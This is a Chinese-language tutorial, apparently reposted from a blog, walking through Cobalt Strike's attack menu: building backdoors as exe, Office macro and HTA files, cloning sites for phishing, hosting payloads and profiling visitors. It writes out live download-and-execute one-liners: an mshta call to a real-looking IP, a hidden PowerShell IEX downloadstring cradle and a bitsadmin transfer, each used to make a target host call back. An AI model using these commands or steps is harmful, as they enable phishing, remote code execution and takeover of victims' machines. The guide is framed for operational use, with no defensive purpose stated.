目錄

一、生成后門

windows可執(zhí)行程序exe

payload生成器

Office宏

HTA文檔

二、Web釣魚

網(wǎng)站克隆

文件托管

web投遞

簽名Applet攻擊和智能Applet攻擊

信息收集

站點(diǎn)管理

三、郵件釣魚

---

在創(chuàng)建完監(jiān)聽器后 ——> CS監(jiān)聽器配置，接下來進(jìn)行后門的生成

一、生成后門

能夠生成如HTA文檔、office宏、payload生成器、exe程序。

windows可執(zhí)行程序exe

可以看到能生成兩種windows可執(zhí)行程序，其分別代表stage分階段和unstage(stageless)不分階段。傳送門 ——>?Cobalt Strike中payload的stage與unstage區(qū)別

選擇監(jiān)聽器后，按需生成不同類型的exe

然后在目標(biāo)機(jī)器運(yùn)行即可上線

payload生成器

該模塊可以生成多種語言的后門Payload，包括C, C#, Python, Java, Perl, Powershell腳本，Powershell命令，Ruby, Raw，免殺框架Veli中的shellcode等。

傳送門 ——>?CS payload生成器(Generator)介紹與上線方式

Office宏

宏病毒是一種常見的計(jì)算機(jī)病毒，寄存在文檔或模板中，并不會直接感染可執(zhí)行程序。但是打開攜帶宏病毒的文檔，其中的命令就會被執(zhí)行，導(dǎo)致文檔所在電腦主機(jī)被感染。

傳送門——>?CobaltStrike 生成office宏病毒進(jìn)行釣魚攻擊

HTA文檔

HTA是HTML Application的縮寫（HTML應(yīng)用程序），是軟件開發(fā)的新概念，直接將HTML保存成HTA的格式，就是一個(gè)獨(dú)立的應(yīng)用軟件，其里面可包含html、js、vb等語言。其和VB、C++等程序語言所設(shè)計(jì)的軟件界面沒什么差別。雙擊hta文件就能運(yùn)行

CobaltStrike可生成三種類型的hta文件，分別是Executable、Powershell、VBA

?這三類樣本的區(qū)別在于：

• Executable 將會在hta文件中內(nèi)嵌一個(gè)PE文件
• Powershell 將會在hta文件中內(nèi)嵌一段Powershell代碼
• VBA 將會在hta文件中內(nèi)嵌一段VBA代碼

1. 生成powershell類型的hta文檔

類容如下

雙擊程序運(yùn)行，主機(jī)上線

?另外兩種不推薦使用，因?yàn)闀?bào)錯(cuò)如下界面：

二、Web釣魚

web釣魚模塊中有如下選項(xiàng)

網(wǎng)站克隆

克隆就是克隆一個(gè)與目標(biāo)網(wǎng)站看起來一模一樣的站點(diǎn)，然后可以在里面插入攻擊代碼，進(jìn)行釣魚攻擊

傳送門——>?cs克隆目標(biāo)站點(diǎn)

文件托管

如上，我們生成了一個(gè)hta類型的后門文件，此時(shí)需要放在目標(biāo)機(jī)器上雙擊才能運(yùn)行，這樣是不是有點(diǎn)麻煩了？我們就想能不能把它放在自己的網(wǎng)站上，然后執(zhí)行命令就能自動下載啟動了？文件托管就是托管一個(gè)文件，提供一個(gè)文件下載

1. 對生產(chǎn)的evil.hta文件進(jìn)行托管

如下，填寫好后點(diǎn)擊運(yùn)行

生成鏈接，只要訪問該鏈接就能將文件下載

運(yùn)行：mshta http://39.100.88.162:80/download/file.ext，就會對該文件進(jìn)行下載和運(yùn)行。主機(jī)即可上線

ps:?mshta是Windows內(nèi)置的一個(gè)程序，主要用于執(zhí)行HTA程序 ，mshta可以直接執(zhí)行遠(yuǎn)端的hta程序

?

web投遞

上面的文件托管需要我們自己選擇一個(gè)文件進(jìn)行托管。而web投遞則是生成并托管一個(gè)payload，通過訪問這個(gè)url就能下載該payload甚至直接執(zhí)行。

如下填寫好，可見生成的payload類型有多種

1. payload為powershell

點(diǎn)擊運(yùn)行，為一段ps腳本，意思為遠(yuǎn)程下載腳本并運(yùn)行。復(fù)制此 直接在主機(jī)上運(yùn)行就能自動下載payload并上線上線

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.xx.xx.162:80/a'))"

2.?payload為powershell IEX

iex是 Invoke-Expression命令 的簡寫，用于執(zhí)行字符串中的命令 如：iex "ls"

生成powershell iex的payload類型，可見比上面ps類型少了前面執(zhí)行的部分

IEX ((new-object net.webclient).downloadstring('http://39.xx.xx.162:8000/a'))

3. payload為exe

可以直接訪問下載exe

4. payload為bitsadmin

Background Intelligent Transfer Service Admin（BITSAdmin） 是一個(gè)命令行工具，可以創(chuàng)建下載或上傳文件并監(jiān)控其進(jìn)度。BITSAdmin是與windows xp一起發(fā)布的。

transfer參數(shù)是從遠(yuǎn)程服務(wù)器下載到本機(jī)的簡單便捷的方法。需要定義傳輸任務(wù)的名稱，可以是任何名字。在示例中，將所有的傳輸任務(wù)定義為hackingarticles。在定義名稱后需要輸入遠(yuǎn)程服務(wù)器文件名的位置。在遠(yuǎn)程服務(wù)器上有一個(gè)名為ignite.png的示例圖像文件。需要本地的路徑和名稱。如下例子：
bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png c:\ignite.png

所以可以利用bitsadmin工具進(jìn)行payload下載與運(yùn)行

在cmd中運(yùn)行復(fù)制的url

?

如下，上線?

簽名Applet攻擊和智能Applet攻擊

• 簽名Applet攻擊：Java Signed Applet Attack，這個(gè)攻擊會啟動一個(gè) web 服務(wù)器來托管一個(gè)自簽名的 Java applet（用Java語言編寫的小應(yīng)用程序，可以直接嵌入到網(wǎng)頁中，并能夠產(chǎn)生特殊的效果。）。訪客被要求給這個(gè) applet 權(quán)限來運(yùn)行。當(dāng)一個(gè)訪客準(zhǔn)許了這個(gè)權(quán)限，你就獲取了到他們系統(tǒng)的權(quán)限。
• 智能Applet攻擊：Java Smart Applet Attack，這個(gè)applet分析它的環(huán)境并決定使用哪個(gè)Java漏洞利用。如果Java版本是有漏洞的，此applet會禁用安全沙箱，并使用Cobalt Strike的Java注入器執(zhí)行payload。

這兩攻擊就不太想嘗試了，因?yàn)楹苌俸苌儆兄鳈C(jī)會存在applet的運(yùn)行環(huán)境。（我也不知道怎么利用~~）

信息收集

生活一個(gè)網(wǎng)站39.100.xx.xx，只要一訪問就跳轉(zhuǎn)到百度的頁面

然后能在 web日志中看到訪問者的一些信息，如ip，訪問使用的瀏覽器名稱和版本

站點(diǎn)管理

以上生成的站點(diǎn)，我們可以在web站點(diǎn)管理中查看

如?

三、郵件釣魚

這個(gè)模塊還是不建議使用，因?yàn)橛懈玫尼烎~工具，如swaks ——>?swaks郵件偽造

總結(jié)

以上是生活随笔為你收集整理的CS之攻击菜单详解-后门生成与上线的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。